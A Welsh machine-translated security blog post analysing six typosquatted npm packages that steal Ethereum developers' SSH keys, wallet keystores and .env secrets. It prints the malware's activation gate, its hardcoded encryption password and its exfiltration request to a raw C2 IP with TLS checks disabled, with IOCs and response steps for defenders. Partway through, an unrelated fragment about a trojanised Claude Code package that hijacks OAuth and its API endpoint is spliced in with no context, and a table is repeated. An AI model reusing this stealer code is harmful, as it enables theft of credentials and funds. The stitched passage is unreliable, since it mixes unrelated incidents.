Ymosodiad Typosquatting EVMDeFi npm yn Dwyn Allweddi Datblygwr

Ymosodiad Typosquatting EVM/DeFi npm yn Dwyn Allweddi Datblygwr

TL; DR

Ar Fai 6, 2026, cyhoeddwr npm sengl, namikazesarada010206, gwthiodd chwe phecyn maleisus yn targedu ecosystem datblygwyr Ethereum, Solidity, a DeFi.

Y pecynnau, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, a web3-utils-core, defnyddiodd enwau credadwy a gynlluniwyd i edrych fel llyfrgelloedd cynorthwyol ar gyfer offer Web3 poblogaidd.

Roedd y chwe phecyn i gyd yn cynnwys yr un peth telemetry.js ffeil. Roedd y ffeil yn union yr un fath â beit ar draws y clwstwr, gyda SHA-256:

SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1

Nid yw'r meddalwedd faleisus yn gweithredu ar adeg gosod. Nid oes preinstall or postinstall bachyn. Yn lle hynny, mae'n actifadu pan fydd y pecyn yn cael ei fewnforio drwyddo require().

Mae'r manylyn hwnnw'n bwysig.

Mae'r mewnblaniad yn aros nes bod datblygwr yn defnyddio'r pecyn mewn gwirionedd. Yna mae'n gwirio a yw'r orsaf waith yn edrych fel amgylchedd datblygu Ethereum / Solidity go iawn. Mae'n chwilio am allweddi Alchemy neu Infura, allweddi preifat, mnemonics, allweddi deployer, neu gyfeiriadur Foundry lleol.

Os yw'r gwesteiwr yn cyfateb, mae'r lleidr yn casglu allweddi preifat SSH, storfeydd allweddi waled Foundry / Geth / Brownie, .env* ffeiliau, a newidynnau amgylcheddol sensitif. Mae'n amgryptio'r bwndel gydag AES-256-GCM gan ddefnyddio cyfrinair caled-godio ac yn ei all-gludo i derfynbwynt IPv4 C2 crai gyda dilysu TLS wedi'i analluogi.

Cadarnhaodd system Rhybudd Cynnar am Feddalwedd Ddrwgwedd (MEW) Xygeni fod y chwe phecyn i gyd yn faleisus. Mae bwndel adroddiad tynnu'r gofrestrfa npm yn yr arfaeth.

Y Clwstwr: Chwe Phecyn, Un Cyhoeddwr

Cyfrif y cyhoeddwr namikazesarada010206 wedi'i gysylltu â'r cyfeiriad Gmail heb ei wirio namikazesarada010206@gmail.com.

Ymddangosodd yr ymgyrch fel cyhoeddiad byrstio un diwrnod ar Fai 6, 2026. Cafodd pob un o'r chwe phecyn eu fersiynau fel 1.0.0, nid oedd ganddo unrhyw ddibyniaethau amser rhedeg, ac fe anfonodd dair ffeil yn unig:

package.json index.js telemetry.js

Fe wnaethant hefyd ddatgan yr un storfa ffynhonnell:

https://github.com/harunosakura030303-maker/evmchain-config

Cafodd y tri phecyn cyntaf eu dal gan sganwyr MEW ar y cyhoeddiad cyntaf. Cafodd y tri sy'n weddill eu fflagio'n orfodol ar ôl adolygiad dadansoddwr o broffil npm y cyhoeddwr. Unwaith yr un fath â beit telemetry.js wedi'i gadarnhau ar draws y clwstwr, cawsant eu cau fel rhai maleisus trwy gysondeb.

pecyn fersiwn npm Cyhoeddwyd Tocyn MEW Verdict
viem-craidd 1.0.0 2026-05-06 01:38:44Z #51049 Maleisus
viem-utils-core 1.0.0 2026-05-06 #51050 Maleisus
caled-het-craidd-utils 1.0.0 2026-05-06 #51051 Maleisus
evm-utils 1.0.0 2026-05-06 #51069 Maleisus, trwy gysondeb
ffowndri-utils 1.0.0 2026-05-06 #51071 Maleisus, trwy gysondeb
web3-utils-core 1.0.0 2026-05-06 #51070 Maleisus, trwy gysondeb

Mae'r strategaeth enwi yn syml ond yn effeithiol.

Nid yw'r pecynnau hyn yn dynwared enwau union i fyny'r afon. Yn lle hynny, maent yn defnyddio ôl-ddodiaid "cyfleustodau" credadwy fel -core, -utils, a -utils-coreMae hynny'n eu gwneud yn edrych fel llyfrgelloedd cydymaith y gallai datblygwr ddisgwyl eu gweld ger offer Web3.

Pecyn Maleisus Targed Cyfreithlon
viem-craidd viem, cleient Ethereum TypeScript poblogaidd
viem-utils-core viem
caled-het-craidd-utils hardhat, amgylchedd datblygu Solidity prif ffrwd
evm-utils Gofod enwau offer EVM generig
ffowndri-utils ffowndri, cadwyn offer Solidity
web3-utils-core web3-utils, cynorthwywyr Web3.js

Dyma batrwm y “pecyn atodol”: nid “Fi yw’r pecyn go iawn,” ond “Rwy’n edrych fel cynorthwyydd rhesymol o amgylch y pecyn go iawn.”

I ddatblygwyr DeFi sy'n symud yn gyflym, mae hynny'n ddigon i greu risg.

Beth Sy'n Digwydd Pan fydd y Pecyn yn Cael ei Mewnforio

Mae'r gadwyn ymosod yn fach, yn fwriadol, ac yn canolbwyntio ar amgylcheddau datblygu crypto.

Nid oes bachyn gosod. Yn lle hynny, mae pob pecyn yn cynnwys index.js sy'n allforio swyddogaeth stub ac yna'n llwytho'r modiwl telemetreg maleisus.

require('./telemetry').init();

Mae hyn yn golygu bod y meddalwedd faleisus yn actifadu ar y mewnforio cyntaf.

Mae hynny'n ddefnyddiol yn weithredol i'r ymosodwr. Mae llawer o sganwyr a blychau tywod yn canolbwyntio ar ymddygiad amser gosod. Mae'r pecyn hwn yn aros nes ei fod yn cael ei ddefnyddio mewn gwirionedd gan ddatblygwr, sgript adeiladu, cyfres brawf, neu lwybr amser rhedeg.

Giât Actifadu: Tanio ar Orsafoedd Gwaith Datblygwyr Web3 Go Iawn yn Unig

Y rhan bwysicaf o'r mewnblaniad yw'r giât actifadu.

Mae'r meddalwedd faleisus yn gwirio am newidynnau amgylcheddol a geir yn gyffredin ar beiriannau datblygwyr Ethereum / Solidity:

const indicators = [   process.env.ALCHEMY_API_KEY,   process.env.INFURA_KEY,   process.env.PRIVATE_KEY,   process.env.MNEMONIC,   process.env.DEPLOYER_KEY, ].filter(Boolean);

Mae hefyd yn gwirio a yw'n ymddangos bod Foundry wedi'i osod:

fs.existsSync(path.join(os.homedir(), '.foundry'))

Os nad yw'r naill amod na'r llall yn wir, mae'r ffwythiant yn dychwelyd ac yn gwneud dim.

Mae hynny'n gwneud y pecyn yn dawelach mewn amgylcheddau dadansoddi generig. Gall blwch tywod heb Foundry, allweddi Alchemy, allweddi Infura, allweddi preifat, neu mnemonics weld mewnforio sy'n edrych yn ddiniwed.

Ar westeiwr cyfatebol, mae'r meddalwedd faleisus yn aros 60 i 90 eiliad cyn ei gasglu:

setTimeout(() => { try { _collect(); } catch {} },           60000 + Math.random() * 30000).unref();

Mae'r oedi yn lleihau'r gydberthynas amlwg rhwng mewnforio ac all-hidlo. .unref() Mae call hefyd yn gadael i'r broses westeiwr adael fel arfer os mewnforiwyd y pecyn mewn sgript byrhoedlog.

Nid ymddygiad swnllyd o dorri a chipio yw hwn. Mae'n lladrad wedi'i dargedu sydd wedi'i gynllunio i osgoi rhedeg oni bai bod yr amgylchedd datblygwr yn werth ei ddwyn.

Beth mae'r Lleidr yn ei Gasglu

Unwaith y bydd y giât actifadu wedi mynd heibio, mae'r meddalwedd faleisus yn casglu o'r ffynonellau sydd bwysicaf mewn datblygu Web3: allweddi preifat, storfeydd allweddi waledi, manylion mewngofnodi defnyddio, cyfrinachau cwmwl, tocynnau npm, a chyfluniad prosiect lleol.

ffynhonnell Beth sy'n cael ei Gasglu
proses.amgylchedd Unrhyw newidyn sy'n cyfateb i /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i
~/.ssh/* Ffeiliau sy'n cynnwys PRIVATE KEY neu BEGIN OPENSSH, gan gynnwys cynnwys llawn y ffeil
~/.foundry/allweddstorfeydd/* Ffeiliau storfa allweddi waled Foundry
~/.ethereum/storfa allweddi/* Ffeiliau storfa allweddi waled Geth
~/.brownie/cyfrifon/* Ffeiliau storfa allweddi waled Brownie
${cwd}/.amgylchedd Cynnwys ffeil llawn
${cwd}/.amgylchedd.lleol Cynnwys ffeil llawn
${cwd}/.amgylchedd.cynhyrchu Cynnwys ffeil llawn
${cwd}/.amgylchedd.datblygiad Cynnwys ffeil llawn
os.hostname() Metadata'r gwesteiwr
crypto.randomUUID() Dynodwr dioddefwr/sesiwn
Dyddiad.nawr() Stamp amser casglu
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com

Y tocynnau ATTA yw:

ATTA_ID 00400014144 ATTA_TOKEN 6478159937

Nid ydym wedi gallu cadarnhau a oedd y telemetreg yn ddadansoddeg y gweithredwr ei hun neu'n sianel a ariannwyd ar wahân. Mae'r tocynnau ATTA yr un peth yn y ddau sampl a archwiliwyd gennym.

Clwstwr B: heibai

claude.hk Gwe-rwydo OAuth + Herwgipio ANTHROPIC_BASE_URL

Y sampl ar 1 Ebrill yw cangen gynharach, fwy crai'r ymgyrch.

heibai:2.1.88-claude.hk-4 cyhoeddwyd gan wuguoqiangvip28, cyfrif a grëwyd ar 7 Mehefin, 2025. Fersiwn benodol a wnaeth y pecyn ei hun yn erbyn y cyfreithlon 2.1.88 Rhyddhad anthropig.

Nid yw'n trafferthu gyda MITM CA-cert. Yn lle hynny, mae'n dweud celwydd wrth y defnyddiwr am y pwynt terfyn OAuth.

Mae'r ychwanegiadau maleisus ar ben y ffynhonnell Claude Code a ollyngwyd yn cynnwys:

ffynhonnell Beth sy'n cael ei Gasglu
proses.amgylchedd Unrhyw newidyn sy'n cyfateb i /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i
~/.ssh/* Ffeiliau sy'n cynnwys PRIVATE KEY neu BEGIN OPENSSH, gan gynnwys cynnwys llawn y ffeil
~/.foundry/allweddstorfeydd/* Ffeiliau storfa allweddi waled Foundry
~/.ethereum/storfa allweddi/* Ffeiliau storfa allweddi waled Geth
~/.brownie/cyfrifon/* Ffeiliau storfa allweddi waled Brownie
${cwd}/.amgylchedd Cynnwys ffeil llawn
${cwd}/.amgylchedd.lleol Cynnwys ffeil llawn
${cwd}/.amgylchedd.cynhyrchu Cynnwys ffeil llawn
${cwd}/.amgylchedd.datblygiad Cynnwys ffeil llawn
os.hostname() Metadata'r gwesteiwr
crypto.randomUUID() Dynodwr dioddefwr/sesiwn
Dyddiad.nawr() Stamp amser casglu

Mae'r rhestr dargedau yn benodol iawn. Nid lladrad porwr generig na chrafu manylion mewngofnodi eang yw hwn. Mae wedi'i anelu at ddatblygwyr sy'n adeiladu, profi, defnyddio neu weithredu cymwysiadau Ethereum.

Mae cynnwys storfeydd allweddi Foundry, Geth, a Brownie yn arbennig o bwysig. Gall y ffeiliau hyn gynrychioli mynediad uniongyrchol i waledi neu hunaniaethau defnyddio. Os gall yr ymosodwr eu paru â chyfrineiriau, mnemonics, neu gyfrinachau amgylchedd, efallai y byddant yn gallu symud arian, dynwared defnyddiowyr, neu beryglu gweithrediadau contract clyfar.

Amgryptio Cyn All-hidlo

Mae'r meddalwedd faleisus yn amgryptio'r data a gesglir cyn ei anfon allan.

const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv);

Y cyfrinair caled yw:

a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d

Mae'r llwyth tâl terfynol wedi'i lapio fel JSON:

{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"}

Nid yw amgryptio yn gwneud y meddalwedd faleisus yn fwy datblygedig ynddo'i hun. Fodd bynnag, mae'n gwneud archwilio rhwydwaith yn anoddach. Byddai amddiffynwr sy'n gwylio allfa yn gweld llwyth tâl JSON, ond nid yr allweddi wedi'u dwyn, ffeiliau waled, nac .env cynnwys heb y cyfrinair caled a'r rhesymeg dadgryptio.

All-hidlo i IPv4 Crai C2

Mae'r llwybr all-hidlo wedi'i godio'n galed:

const req = https.request({   hostname: '76.13.37.80', port: 8443,   path: '/api/v1/telemetry', method: 'POST',   headers: { 'Content-Type': 'application/json', ... },   rejectUnauthorized: false, timeout: 8000, }, () => {});

Mae'r meddalwedd faleisus yn anfon data i:

https://76.13.37.80:8443/api/v1/telemetry

Mae dau fanylyn yn sefyll allan.

Yn gyntaf, cyfeiriad IPv4 crai yw'r C2 yn hytrach na pharth. Mae hynny'n dileu'r angen i gofrestru parth ac yn osgoi rhai canfodiadau sy'n seiliedig ar barth.

Yn ail, mae dilysu TLS wedi'i analluogi gyda:

rejectUnauthorized: false

Mae hynny'n caniatáu i'r meddalwedd faleisus dderbyn unrhyw dystysgrif, gan gynnwys tystysgrifau hunan-lofnodedig. Mewn geiriau eraill, mae'r ymosodwr yn cael cludiant wedi'i amgryptio heb fod angen tystysgrif gyhoeddus ddilys.

Nid oes rhesymeg ail-geisio na gwesteiwr wrth gefn. Mae gwallau'n cael eu llyncu'n dawel. Mae hyn yn cadw'r pecyn yn dawel os yw'r C2 all-lein neu'n anghyraeddadwy.

Pam Mae'r Ymgyrch Hon yn Bwysig

Mae'r rhan fwyaf o becynnau npm maleisus sydd wedi'u hanelu at ddatblygwyr yn mynd ar ôl manylion mewngofnodi eang: tocynnau npm, allweddi AWS, tocynnau GitHub, neu .npmrc ffeiliau.

Mae'r ymgyrch hon yn culhau'r targed.

Mae'n chwilio am arwyddion bod y peiriant yn perthyn i ddatblygwr Ethereum neu Solidity. Yna mae'n tynnu'r union asedau sy'n bwysig yn yr amgylchedd hwnnw: storfeydd allweddi waled, allweddi preifat, mnemonics, allweddi deployer, .env ffeiliau, ac allweddi SSH.

Mae hynny'n gwneud yr ymgyrch yn fwy peryglus i dimau Web3 na lladrad npm generig.

Gallai haint llwyddiannus ddatgelu:

  • Waledi defnyddio
  • Allweddi gweinyddu contract clyfar
  • Allweddi darparwr RPC
  • Manylion defnyddio cwmwl
  • tocynnau cyhoeddi npm
  • Mynediad SSH i seilwaith datblygwr neu adeiladwr
  • Cyfrinachau prosiect wedi'u storio yn .env ffeiliau
  • Storfeydd allweddi waled ar gyfer Foundry, Geth, neu Brownie

Mae enwau'r pecynnau hefyd yn dangos peirianneg gymdeithasol glir. Maent yn targedu ecosystem datblygwyr Web3 trwy enwau offer cyfarwydd: viem, hardhat, foundry, evm, a web3.

Nid oes angen i'r actor gyfaddawdu ar y prosiectau go iawn. Dim ond angen i ddatblygwr osod yr hyn sy'n edrych fel pecyn cydymaith rhesymol.

Dangosyddion o Gyfaddawd a Chanfod

Pecynnau a Chyhoeddwr
Maes Gwerth
cyhoeddwr npm namikazesarada010206
E-bost y cyhoeddwr namikazesarada010206@gmail.com
e-bost wedi'i wirio Na
SCM gwirio Na
Sgôr enw da 1.0
Pecynnau viem-core, viem-utils-core, hardhat-core-utils, evm-utils, ffowndri-cyfleustodau, gwe3-utils-core
fersiynau Mae pob 1.0.0
Storfa ffynhonnell https://github.com/harunosakura030303-maker/evmchain-config
Wedi'i gadarnhau'n faleisus Pob chwe phecyn
Rhwydwaith
math Gwerth
Terfyn terfyn C2 https://76.13.37.80:8443/api/v1/telemetry
IP C2 76.13.37.80
Porthladd C2 8443/tcp
Ymddygiad TLS gwrthodHeb awdurdod: ffug
Cynllun llwyth tâl {"v":2,"iv": "d": "t": }
Ffeiliau a Hashes
math Gwerth
telemetreg.js SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1
Cynllun y pecyn pecyn.json, mynegai.js, telemetreg.js
Cyfrif ffeiliau 3
Maint cyfanswm bras 3.4 KB

Signalau Actifadu

Mae'r meddalwedd faleisus yn gwirio am y newidynnau amgylcheddol hyn:

ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY

Mae hefyd yn gwirio am:

~/.foundry/

Llwybrau Gwesteiwr Targedig

~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development

Regex Casgliad

/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i

Nodiadau Canfod

Mae sawl rheol yn dal yr ymgyrch hon heb fod angen dadansoddiad ymddygiadol llawn.

Yn gyntaf, sganiwch ffeiliau clo am y chwe enw pecyn maleisus:

viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core

Unrhyw gêm yn package-lock.json, yarn.lock, pnpm-lock.yaml, neu node_modules dylid trin hanes fel digwyddiad difrifol.

Yn ail, monitro am brosesau Node.js sy'n darllen llwybrau allweddell waled:

~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/

Anaml y bydd hwn yn ymddygiad cyfreithlon ar gyfer pecyn a fewnforiwyd fel dibyniaeth gynorthwyol. Mae'n arbennig o amheus pan gaiff ei ddilyn gan weithgarwch rhwydwaith allanol.

Yn drydydd, blociwch neu rybuddwch ar gysylltiadau HTTPS i:

76.13.37.80:8443

Yn enwedig pan fo llwybr y cais yn:

/api/v1/telemetry

Yn bedwerydd, chwiliwch am becynnau npm sy'n cyfuno'r nodweddion hyn:

  • Cyhoeddwr newydd neu â henw da isel
  • Cyfrif Gmail heb ei wirio
  • Enw pecyn cyfagos i Web3
  • Dim hanes ystorfa ystyrlon
  • Cynllun pecyn bach
  • index.js sy'n llwytho ffeil telemetreg neu ffeil gynorthwyol
  • Dim dibyniaethau amser rhedeg
  • Casgliad newidynnau amgylchedd sensitif
  • Mynediad i storfa allweddi waled

Mae'r patrwm hwn yn fwy defnyddiol nag un IOC oherwydd gall y pecyn nesaf newid y cyfeiriad IP ond cadw'r un rhesymeg dargedu.

Rhestr Wirio Ymateb i Gyfaddawd

Os defnyddiodd datblygwr un o'r chwe phecyn a bod eu hamgylchedd yn cyfateb i'r giât actifadu, ystyriwch y gweithfan fel pe bai wedi'i chyfaddawdu.

Mae hynny'n cynnwys peiriannau gyda Foundry wedi'i osod, allweddi Alchemy neu Infura yn yr amgylchedd, allweddi preifat, mnemonics, neu allweddi defnyddio.

Ymateb a argymhellir:

  • Datgysylltwch y gwesteiwr o'r rhwydwaith.
  • Cadw node_modules, ffeiliau clo, hanes cragen, a logiau perthnasol ar gyfer fforensig.
  • Cylchdroi pob pâr allweddi SSH o dan ~/.ssh/.
  • Cylchdroi allweddi waled ar gyfer pob storfa allweddi oddi tano ~/.foundry, ~/.ethereum, a ~/.brownie.
  • Symudwch arian i waledi newydd.
  • Cylchdroi pob cyfrinach sydd wedi'i storio yn .env* ffeiliau mewn ystorfeydd y gweithiodd y datblygwr ynddynt.
  • Cylchdroi cyfrinachau amgylchedd sy'n cyfateb i'r regex casgliad, gan gynnwys allweddi AWS, tocynnau npm, tocynnau defnyddio, allweddi API, allweddi preifat, hadau, a mnemonics.
  • Archwilio gweithgaredd cwmwl, npm, GitHub, darparwr RPC, a blockchain ers i'r pecyn gael ei osod gyntaf.
  • Ail-delweddu'r orsaf waith cyn ei hailddefnyddio.

Yr Hyn y Dylai Amddiffynwyr Ei Gymryd I Ffwrdd

Mae'r ymgyrch hon yn dangos sut mae typosquatting npm yn esblygu o amgylch ecosystemau datblygwyr gwerth uchel.

Nid oedd angen dyfalbarhad ar yr actor. Nid oedd angen drysu arnynt. Nid oedd angen gweithredu amser gosod arnynt hyd yn oed.

Yn hytrach, roedden nhw'n dibynnu ar dri pheth:

  • Enwau pecynnau Web3 credadwy
  • Dim ond ar beiriannau datblygu crypto go iawn y gellir eu actifadu
  • Lladrad uniongyrchol o'r ffeiliau a'r cyfrinachau sydd bwysicaf i ddatblygwyr Ethereum

Mae hynny'n gwneud yr ymgyrch yn hawdd i'w cholli mewn sganio eang ac yn beryglus pan fydd yn glanio yn yr amgylchedd cywir.

I dimau Web3, mae'r wers yn glir: trin enwau dibyniaethau fel rhan o'ch model bygythiad. Gall pecyn sy'n edrych fel cynorthwyydd diniwed ddod yn llwybr byrraf i beryglu waled o hyd.

Wedi'i adrodd i'r gofrestrfa npm. Byddwn yn diweddaru'r post hwn pan fydd cyfrif a phecynnau'r cyhoeddwr yn cael eu tynnu.

offer-sca-meddalwedd-offer-dadansoddi-cyfansoddiad
Blaenoriaethu, cywiro a diogelu eich risgiau meddalwedd
Cael eich Cyfrif Am Ddim.
Nid oes angen cerdyn credyd.

Sicrhau eich Datblygiad a Chyflwyniad Meddalwedd

gyda Phecyn Cynnyrch Xygeni